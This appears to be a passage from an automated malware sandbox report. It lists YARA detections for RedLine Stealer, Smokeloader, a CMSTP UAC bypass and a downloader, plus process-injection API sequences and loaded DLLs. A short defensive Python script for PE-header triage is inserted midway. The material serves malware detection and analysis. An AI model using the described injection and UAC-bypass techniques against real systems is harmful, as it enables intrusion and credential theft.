Source: Yara match | File source: 00000006.00000002.1793962447.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1550099786.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000027.00000002.2031135707.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000027.00000003.1975503858.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1549874616.0000000000500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000027.00000002.2031801803.0000000004851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

E-Banking Fraud

Source: Yara match | File source: 33.2.288c47bbc1871b439df19ff4df68f076.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 33.2.288c47bbc1871b439df19ff4df68f076.exe.2e00e67.15.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000021.00000002.2027202659.0000000000843000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000002.2034312044.0000000003243000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 10.2.93D2.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 16.2.93D2.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 29.0.BB62.exe.b80000.0.unpack, type: UNPACKEDPE | Matched rule: Detects downloader / injector Author: ditekSHen
Source: 00000001.00000002.1549966457.0000000000529000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000018.00000002.1889731561.0000000002800000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.1793881515.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000027.00000002.2031095427.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000006.00000002.1793962447.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000001.00000002.1550099786.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000027.00000002.2031135707.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000027.00000002.2031606474.0000000002DCA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000001.00000002.1549874616.0000000000500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000021.00000002.2034312044.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000006.00000002.1794086138.0000000000729000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000001.00000002.1549853433.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000006.00000002.1793860457.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000027.00000002.2031801803.0000000004851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000021.00000002.2033637211.0000000002A00000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000007.00000002.1767566996.000000000233D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: C:\Users\user\AppData\Local\Temp\BB62.exe, type: DROPPED | Matched rule: Detects downloader / injector Author: ditekSHen
Source: C:\Windows\explorer.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\8837.exe | Memory allocated: 71495000 page read and write
Source: C:\Users\user\AppData\Local\Temp\8837.exe | Memory allocated: 71616000 page read and write
Source: C:\Users\user\AppData\Local\Temp\8837.exe | Memory allocated: 717F8000 page read and write
Source: C:\Users\user\AppData\Local\Temp\8837.exe | Memory allocated: 7198F000 page read and write
Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: 1_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: 1_2_00401561 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: 1_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: 1_2_0040156F NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: 1_2_00401729 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: 1_2_00403335 RtlInitUnicodeString,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,NtQueryKey,NtEnumerateKey,RtlCreateUserThread,strstr,tolower,towlower
Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: 1_2_004023E5 NtQuerySystemInformation
Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: 1_2_00401583 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: 1_2_00401587 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: 1_2_004026A0 NtEnumerateKey
Source: C:\Users\user\AppData\Roaming\afratej | Code function: 6_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
Source: C:\Users\user\AppData\Roaming\afratej | Code function: 6_2_00401561 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
Source: C:\Users\user\AppData\Roaming\afratej | Code function: 6_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
Source: C:\Users\user\AppData\Roaming\afratej | Code function: 6_2_0040156F NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
Source: C:\Users\user\AppData\Roaming\afratej | Code function: 6_2_00401729 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
Source: C:\Users\user\AppData\Roaming\afratej | Code function: 6_2_00403335 RtlInitUnicodeString,NtEnumerateKey
Source: C:\Users\user\AppData\Roaming\afratej | Code function: 6_2_004023E5 NtQuerySystemInformation
Source: C:\Users\user\AppData\Roaming\afratej | Code function: 6_2_00401583 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
Source: C:\Users\user\AppData\Roaming\afratej | Code function: 6_2_00401587 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
Source: C:\Users\user\AppData\Roaming\afratej | Code function: 6_2_004026A0 NtEnumerateKey
Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: 7_2_02500110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: 10_2_00409543 GetWindowsDirectoryW,NtAllocateVirtualMemory,EnterCriticalSection,RtlInitUnicodeString,RtlInitUnicodeString,LeaveCriticalSection,LdrEnumerateLoadedModules
Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: 10_2_0040E48D NtQuerySystemInformation
Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: 10_2_00401B2C NtQueryInformationProcess
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_051AC7A0 NtCreateThreadEx
Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: 16_2_00409543 GetWindowsDirectoryW,NtAllocateVirtualMemory,EnterCriticalSection,RtlInitUnicodeString,RtlInitUnicodeString,LeaveCriticalSection,LdrEnumerateLoadedModules
Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: 16_2_00401B2C NtQueryInformationProcess
Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: 16_2_004023F2 LoadLibraryA,LookupPrivilegeValueA,AdjustTokenPrivileges,LoadLibraryA,NtShutdownSystem
Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: 16_2_0040E48D NtQuerySystemInformation
Source: C:\ProgramData\Drivers\csrss.exe | Code function: 24_2_02A00110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: 10_2_0040B453: DeviceIoControl
Source: C:\Users\user\AppData\Local\Temp\93D2.exe | Code function: 16_2_004023F2 LoadLibraryA,LookupPrivilegeValueA,AdjustTokenPrivileges,LoadLibraryA,NtShutdownSystem
Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: 1_2_00421655
Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: 1_2_0041C223
Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: 1_2_0041CE30
Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: 1_2_0041BCD2
Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: 1_2_004196DE
Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: 1_2_00422894
Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: 1_2_0041C8B6
Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: 1_2_0041CB31
Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: 1_2_004211C0
Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: 1_2_00421DC5
Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: 1_2_004219F3
Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: 1_2_0041B783
Source: C:\Users\user\Desktop\ccQGH1mKws.exe | Code function: 1_2_004221AD
Source: C:\Users\user\AppData\Roaming\afratej | Code function: 6_2_00421655
Source: C:\Users\user\AppData\Roaming\afratej | Code function: 6_2_0041C223
Source: C:\Users\user\AppData\Roaming\afratej | Code function: 6_2_0041CE30
Source: C:\Users\user\AppData\Roaming\afratej | Code function: 6_2_0041BCD2
Source: C:\Users\user\AppData\Roaming\afratej | Code function: 6_2_004196DE
Source: C:\Users\user\AppData\Roaming\afratej | Code function: 6_2_00422894
Source: C:\Users\user\AppData\Roaming\afratej | Code function: 6_2_0041C8B6
Source: C:\Users\user\AppData\Roaming\afratej | Code function: 6_2_0041CB31
Source: C:\Users\user\AppData\Roaming\afratej | Code function: 6_2_004211C0
Source: C:\Users\user\AppData\Roaming\afratej | Code function: 6_2_00421DC5
Source: C:\Users\user\AppData\Roaming\afratej | Code function: 6_2_004219F3
Source: C:\Users\user\AppData\Roaming\afratej | Code function: 6_2_0041B783
Source: C:\Users\user\AppData\Roaming\afratej | Code function: 6_2_004221AD
Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: 7_2_0040FC55
Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: 7_2_004074BE
Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: 7_2_005D011C
Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: 7_2_005CE10E
Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: 7_2_005CF538
Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: 7_2_005D0E3E
Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: 7_2_005D0696
Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: 7_2_005CFA89
Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: 7_2_0040F7C0
Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: 7_2_004103C5
Source: C:\Users\user\AppData\Local\Temp\8837.exe | Code function: 7_2_0040FFF3
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_005CEFE97_2_005CEFE9
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_005D03977_2_005D0397
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_004107AD7_2_004107AD
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_005D27A17_2_005D27A1
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_05074F5415_2_05074F54
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_05074B0C15_2_05074B0C
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_05071ED415_2_05071ED4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_05072C5815_2_05072C58
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_050720A415_2_050720A4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_0507313C15_2_0507313C
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_05072D7815_2_05072D78
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_051ABD5015_2_051ABD50
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_051A144315_2_051A1443
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_051A164015_2_051A1640
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_051AB88215_2_051AB882
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_051ABB8215_2_051ABB82
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_051A858015_2_051A8580
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_051AC7A015_2_051AC7A0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_051AC5F415_2_051AC5F4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_051ACF1015_2_051ACF10
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_051A912015_2_051A9120
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_051A829015_2_051A8290
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_051A8DB015_2_051A8DB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_051ABFE015_2_051ABFE0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_051A10E015_2_051A10E0
                  Source: Joe Sandbox View Dropped File: C:\ProgramData\Drivers\csrss.exe A1480E23BD2A89B188FB01138EF2F54130F2DC41CE85FF9319AB7F15471B0011
                  Source: Joe Sandbox View Dropped File: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe 5DFAA8987F5D0476B835140D8A24FB1D9402E390BBE92B8565DA09581BD895FC
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Code function: String function: 00401DE0 appears 32 times
                  Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4248 -ip 4248
                  Source: A6A0.exe.2.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: A6A0.tmp.17.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                  Source: A6A0.tmp.17.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                  Source: A6A0.tmp.17.dr Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                  Source: A6A0.tmp.20.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                  Source: A6A0.tmp.20.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                  Source: A6A0.tmp.20.dr Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                  Source: is-88CHK.tmp.21.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                  Source: is-88CHK.tmp.21.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                  Source: is-88CHK.tmp.21.dr Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                  Source: is-MN9TN.tmp.21.dr Static PE information: Number of sections : 11 > 10
                  Source: is-AQ01D.tmp.21.dr Static PE information: Number of sections : 11 > 10
                  Source: BroomSetup.exe.34.dr Static PE information: Number of sections : 11 > 10
                  Source: is-NDO9R.tmp.21.dr Static PE information: Number of sections : 11 > 10
                  Source: is-RGLU2.tmp.21.dr Static PE information: Number of sections : 11 > 10
                  Source: is-7865G.tmp.21.dr Static PE information: Number of sections : 11 > 10
                  Source: is-37AOI.tmp.21.dr Static PE information: Number of sections : 11 > 10
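The "Static PE information" entries above come from two cheap header checks: a section table larger than 10 entries, and resources that themselves start with a PE header (an installer or dropper carrying its payloads). Both can be reproduced with a few reads of the DOS, COFF and optional headers. The Python below is an added example written for this page, not Joe Sandbox code. It simplifies the resource check to a scan for any embedded MZ/PE header that parses, wherever it sits in the file (an assumption; the report walks the resource directory), and the `build_pe` helper fabricates a minimal, constructed PE so the script runs offline without a real sample.

```python
import struct


def _u16(b, off):
    return struct.unpack_from("<H", b, off)[0]


def _u32(b, off):
    return struct.unpack_from("<I", b, off)[0]


def parse_pe(data):
    """Minimal PE header walk: machine, section count and whether the
    optional header is PE32+ (x86-64). Returns None if `data` is not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = _u32(data, 0x3C)
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    fh = e_lfanew + 4                      # IMAGE_FILE_HEADER
    opt = fh + 20                          # IMAGE_OPTIONAL_HEADER
    magic = _u16(data, opt) if opt + 2 <= len(data) else 0
    return {
        "machine": _u16(data, fh),
        "sections": _u16(data, fh + 2),
        "pe32plus": magic == 0x20B,
    }


def find_embedded_pes(data):
    """Offsets of further MZ/PE headers inside the file body. Assumed
    simplification of the resource check: any header that parses counts."""
    hits, pos = [], data.find(b"MZ", 1)
    while pos != -1:
        if parse_pe(data[pos:]) is not None:
            hits.append(pos)
        pos = data.find(b"MZ", pos + 1)
    return hits


def triage(data, max_sections=10):
    """Static findings in the style of the report: oversized section table
    and executables carried inside the file."""
    info = parse_pe(data)
    if info is None:
        return ["not a PE file"]
    findings = []
    if info["sections"] > max_sections:
        findings.append(f"Number of sections : {info['sections']} > {max_sections}")
    for off in find_embedded_pes(data):
        kind = "PE32+" if parse_pe(data[off:])["pe32plus"] else "PE32"
        findings.append(f"embedded {kind} image at offset 0x{off:x}")
    return findings


def build_pe(nsections, pe32plus=False, payload=b""):
    """Constructed minimal PE (valid headers, zeroed section table, optional
    trailing payload). Offline sample input only, not a file from the report."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                  # e_lfanew
    machine, opt_size = (0x8664, 0xF0) if pe32plus else (0x14C, 0xE0)
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    file_hdr = struct.pack("<HHIIIHH", machine, nsections, 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)   # Magic
    return bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + bytes(40 * nsections) + payload


if __name__ == "__main__":
    # An 11-section PE32 that carries a PE32+ image, like the is-*.tmp files above.
    outer = build_pe(11, payload=build_pe(3, pe32plus=True))
    for line in triage(outer):
        print(line)
```

A real sample drops in as `triage(open(path, "rb").read())`. Both findings are only hints: legitimate Inno Setup and Go binaries routinely exceed 10 sections, and self-extracting installers legitimately embed executables, which is why the report lists these as static observations rather than as malicious signatures on their own.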
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exe Section loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exe Section loaded: msimg32.dll
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exe Section loaded: msvcr100.dll
                  Source: C:\Windows\explorer.exe Section loaded: taskschd.dll
                  Source: C:\Windows\explorer.exe Section loaded: webio.dll
                  Source: C:\Users\user\AppData\Roaming\afratej Section loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Roaming\afratej Section loaded: msimg32.dll
                  Source: C:\Users\user\AppData\Roaming\afratej Section loaded: msvcr100.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: msimg32.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: csunsapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: swift.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: nfhwcrhk.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: surewarehook.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: netapi32.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: wkscli.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: netapi32.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: wkscli.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: csunsapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: aep.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: atasi.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: swift.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: nfhwcrhk.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: nuronssl.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: surewarehook.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: ubsec.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: aep.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: atasi.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: swift.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: nfhwcrhk.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: nuronssl.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: surewarehook.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: ubsec.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: netapi32.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: wkscli.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: textshaping.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: textinputframework.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: coreuicomponents.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe Section loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exe Section loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exe Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exe Section loaded: webio.dll
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exe Section loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exe Section loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exe Section loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exe Section loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exe Section loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exe Section loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exe Section loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exe Section loaded: schannel.dll
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exe Section loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exe Section loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exe Section loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exe Section loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exe Section loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exe Section loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exe Section loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exe Section loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exe Section loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exe Section loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe Section loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe Section loaded: winmm.dll
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe Section loaded: kernel.appcore.dll
